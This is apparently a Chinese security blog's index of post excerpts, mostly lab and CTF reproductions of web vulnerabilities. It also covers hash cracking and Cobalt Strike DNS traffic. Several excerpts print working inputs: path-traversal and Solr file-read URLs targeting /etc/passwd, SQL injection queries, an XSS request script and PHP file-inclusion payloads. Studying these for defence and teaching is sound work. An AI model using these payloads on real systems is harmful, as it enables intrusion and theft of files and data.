- 博客(177)
- 资源 (4)
- 收藏
- 关注
原创 本地密码爆破
linux中 /etc/passwd和shadow这两个文件是孪生兄弟,如果passwd文件中密码部分是用X来代替的话说明他的密码是在shadow中保存了。--wordlist=/usr/share/wordlists/rockyou.txt 指定密码文件。--format=crypt 选择类型。hash 指明包含密码的文件。通过命令将hash的密码保存下来。通过john工具进行密码对撞。
2023-06-07 16:31:58 311
原创 【无标题】
上述步骤安装完之后,就要去配置一下环境变量。我的电脑->属性->高级系统设置->环境变量->,然后在右边选GCC和G++就好了。,然后让其自动下载安装就好了,它是边下载边安装的。变量值:C:\mingw\include。安装完成之后,会自动弹出一个窗口,叫做。变量名:C_INCLUDE_PATH。有没有安装成功把,打开终端,输入。变量名:LIBRARY_path。变量值:C:\mingw\lib。,选择完之后,点击菜单栏的。安装c环境(gcc)链接。
2023-06-07 16:10:36 747
原创 python3 chromedrivers签到
爬虫一般是useragent,或者js脚本交互验算的方式来反机器人爬虫,只是很多反爬虫容易被侦测出来容易被拦截,这里有个思路可以用webdrivers来驱动浏览器去爬虫,这样就可以绕过大多数的防爬机制(有些高级的防反爬虫也不行,比如验证码,鼠标轨迹验证等技术这样chromedriver就不管用了)总的来说这个脚本就是用chrome 打开这个网站,然后输入这个dnslog的网址去ping一下。下载后解压,将里面的chromedriver 复制到/usr/bin/ 目录下面(pach环境变量里面)即可。
2023-03-19 17:09:25 392 1
原创 tcpdump抓包
做个引用防止查找迷路tcpdump -nni eth10 -s0 -e vlan and port 8080 and host 1.1.1.1or host 2.2.2.2 -w tcpdump0705-1.pcap
2022-05-06 19:09:07 211
原创 SQLMAP-绕过脚本,混淆脚本
sqlmap-tamper 在kali 的储存位置为/usr/share/sqlmap/tamper当我们对于一些特殊的字符做替换的时候我们可以通过tamper中的脚本进行自动化的更改我们发送的payload这里举个注入的例子我们正常的攻击求如下:sqlmap 上普通注入命令如下:sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user...
2022-01-13 11:34:43 2175
原创 Linux如何通过文本关键字查找文件
1:搜索某个文件里面是否包含字符串,使用grep "search content" filename1, 例如$ grep ORA alert_gsp.log$ grep "ORA" alert_gsp.log2: 如果你想搜索多个文件是否包含某个字符串,可以使用下面方式grep "search content" filename1 filename2.... filenamengrep "search content" alert_gsp.log3:如果需要显示搜索文.
2022-01-09 17:29:01 8853
原创 Fastjson 远程命令执⾏漏洞
什么是 Fastjson Fastjson是阿⾥开发的⼀款专门⽤于Java开发的包,可以⽅便的实现 json 对象与 JavaBean 对象的转换,JavaBean 对象与 json 字 符串的转换, json 对象与 json 字符串的转换。API 使⽤//序列化String text = JSON.toJSONString(obj);//反序列化VO vo = JSON.parse(); //解析为JSONObject类型或者JSONArray类型VO vo = JSON.pars
2022-01-06 13:57:57 2138
原创 光纤光模块的一些知识
sc接口条线 和lc接口条线 经常用于交换机路由器之间。这两种经常用于odf配线架(城市大马路上又有一些机柜里面会有这种接口)MPO接口光模块MPO接口光模块是指接口采用MPO连接器的光模块,通常与MPO光纤跳线搭配使用。因为光模块MPO接口一般采用公头类型上面讲述的全是机房常见的接口类型里了,下面来说一说波长和线缆先说波长:不同的波长在传输中的损耗也不一样一般来多模的光模块只能跑几百米(一般情况下150M以内,3...
2022-01-01 20:04:23 1945
原创 Cobaltstrike dns上线 (观察流量)
今天做了一个cs-dns的上线过程,发现这个上限的方式还是挺隐蔽的。通过ip查询起来的话很难被追溯到。所有的流量全部是通过dns端口来做控制的。首先通过exe的木马确保上限然后在被控端端开启wireshark随后在控制端下一个命令下面是我在下达命令之后的一个完整流量截图,其中像这种txt api.xxx post.xxxx之类的都是cs在传输数据的特征。这个图片其实不大,但是用dns的端口去用来传输数据的话这个就很慢了流量差不多这个地方才结束吧。截取桌面的这个动作差...
2021-12-09 15:29:55 5417
原创 Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)
产品样子Django在2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。参考链接: Django security releases issued: 2.2.4, 2.1.11 and 1.11.23 | Weblog | Django Django JSONField SQL注入漏洞(CVE-2019-14234)分析与影响 | 离别歌 该漏洞需要开发者使用了JSONField/HStoreFi.
2021-12-07 17:34:17 1331
原创 Discuz 7.x/6.x 全局变量防御绕过导致代码执行
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。具体原理请参考: Discuz! 6.x/7.x 全局变量防御绕过导致命令执行 - SecPulse.COM | 安全脉搏 产品样子直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray.
2021-12-07 16:00:08 1168
原创 Couchdb 任意命令执行漏洞(CVE-2017-12636)
产品样子该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。首先通过(CVE-2017-12635)漏洞创建一个用户qwe 密码也是qwe1.6.0 下的说明依次执行如下请求即可触发任意命令执行:查看命令执行的结果按照 vulhub中提示的环境来看这些命令也可以通过curl命令进行其中,`vulhub:vulhub`为管理员账号密码。curl -X PUT 'ht...
2021-12-07 15:38:30 1952
原创 Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
2021-12-07 13:52:56 2485
原创 Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
产品样子Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的.
2021-12-06 16:54:53 763
原创 Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。产品样子:漏洞复现登录界面?后边locale=../../../../../../../../../../etc/passwd%00en即可读取后台用户密码locale=../../..
2021-12-06 15:03:23 277
原创 AppWeb认证绕过漏洞(CVE-2018-8715)
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 f
2021-12-06 13:31:43 159
原创 imperva数据库脱敏-server2008
首先安装一个server2008其他的server也行然后安装java环境后安装tomcat中间件一路默认就好这就是tomcat的控制台然后安装postgresql数据库 官方的要求是9.1-9.3的版本。这个数据库也是默认安装就好。里面的密码我设的的Webco123数据库安装完成下一步安装发现脱敏的控制台界面camouflage-web-a...
2021-12-06 13:07:40 279
原创 Apereo CAS 4.1 反序列化命令执行漏洞
产品样子影响范围: Apereo CAS <= 4.1.7http://your-ip:8080/cas/login即可查看到登录页面。我们使用(apereo-cas-attack-1.0-SNAPSHOT-all.jar)来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload:jar文件下载地址https://github.com/vulhub/Apereo-CAS-Attack/releases.java -jar ...
2021-11-26 17:20:00 1504
原创 ActiveMQ任意文件写入漏洞(CVE-2016-3088)
产品界面默认的账号密码都是 admin admin (这里先说一下后面会提到只有登录后才可以往里面写shell)登录后去访问这个固定的界面(这是一个产品自身情况检查的一个固定界面)http://192.168.1.53:8161/admin/test/systemProperties.jsp访问这个界面后我们可以看到该服务器的一些绝对路径(上传木马的时候会用到)这里做个背景简述ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中...
2021-11-26 15:39:18 1293
原创 nohup 产生的nohup.out日志文件
当我们通过ssh连接到服务器,并运行一个简单的脚本文件,在会话未断开的时候是可以一直运行的,但是如果因为网络抖动等因素导致会话断开时我们所正在运行的脚本也跟随着关闭。这个时候nohop 这个命令就会帮助我们在会话断开后脚本仍旧运行的神器。nohop ./nps & #该命令可以让我们的脚本在后台运行但是这个也有个问题就是随着时间越长脚本产生的日志也跟随着变大几K的脚本产生的日志文件却又几百兆,用不了多长时间磁盘的空间就会被占满。因此我们可以使用...
2021-11-24 21:50:57 2858
原创 sql注入报错注入-ctf
找数据库?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23获取表名?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='secur
2021-08-11 17:08:22 237
原创 xss-javascript发送数据包-ctf
javascript 制作存储型xss发送数据包<script> xhr = new XMLHttpRequest(); xhr.open("post", "/bWAPP/xss_stored_1.php", true); //请求类型,url xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded'); //头部字段 xhr.send("entry=" + docu
2021-08-11 12:36:21 391
原创 windows 下java 文件闪退
可以尝试以下的解决办法,希望能够帮助你:第一种方法:步骤一:新建一个文本文档,输入内容"javaw -jar %1 ",并保存为批处理文件,例如"run.bat "。步骤二:右键点击.jar格式的文件 ,选择其打开方式 为上面建的run.bat 。此时jar就能运行了。第二种方法:第一种方法可以解决问题,但是有些不足之处,下面介绍一种更好的方法:通过修改注册表来解决该问题。步骤一:打开注册表,开始->运行(或者用快捷键WIN+R),输入regedit,确定步骤二:选择默
2021-08-09 23:14:18 1611
原创 php序列化和反序列化-ctf
<?phperror_reporting(0);include "key4.php";$TEMP = "Whatever is worth doing is worth doing well.";$str = $_GET['str'];if (unserialize($str) === $TEMP){ echo "$key4";}show_source(__FILE__);通过上述得知unserialize($str)中反序列化后的值等于Whatever is worth.
2021-08-08 22:33:27 1171
原创 PHP 文件包含 -ctf
php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini”http://192.168.43.173:8999/lsawebtest/phptest/phprotocol1.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==也可以用来读php文件源码:data:text/plain,<?phpsystem(‘c..
2021-08-08 22:28:09 684
原创 SQL注入常用到的绕过方式-ctf
Syslog配置然后保存就好了syslog日志的操作集就创建完了123最后保存应用设置cpu告警的值在什么地方???...
2021-08-08 22:02:10 1381
原创 linux 查看文件内容的方式-ctf
cat:从第一行开始显示文本内容(适用于内容较少的) tac:从最后一行开始显示,是 cat 的逆顺序 more:一页一页的显示文本内容(适用于内容较多的) less:与 more 类似,但是比 more 更好的是,它可以往前翻页! head:只看文本的前面几行 tail:只看文本的后面几行 nl:显示文本内容与行号 ...
2021-08-08 21:31:46 512
原创 Apache Solr 任意文件读取复现
Apache Solr然后访问这个目录就可以拿到当前db的名字 http://[ip]/solr/admin/cores?indexInfo=false&wt=json然后把得到的名字在这个url中替换掉就可以任意的读取文件http://[IP]/solr/[name]/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd...
2021-04-09 16:19:26 277
原创 firewalld 配置文件的位置
开放端口永久开放2个端口firewall-cmd --permanent --zone=public --add-port=80/tcpfirewall-cmd --permanent --zone=public --add-port=443/tcpfirewall-cmd --reload在/etc/firewalld/zones/public.xml里面:<?xml version="1.0" encoding="utf-8"?><zone>...
2021-02-17 19:40:00 2246 1
原创 google常用语法
1、双引号把搜索词放在双引号中,代表完全匹配搜索,也就是说搜索结果返回的页面包含双引号中出现的所有的词,连顺序也必须完全匹配。bd和Google 都支持这个指令。例如搜索: “seo方法图片”2、减号减号代表搜索不包含减号后面的词的页面。使用这个指令时减号前面必须是空格,减号后面没有空格,紧跟着需要排除的词。Google 和bd都支持这个指令。例如:搜索 -引擎返回的则是包含“搜索”这个词,却不包含“引擎”这个词的结果3、星号星号*是常用的通配符,也可以用在搜索中。百度不支持*号
2021-02-04 11:17:25 4446
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人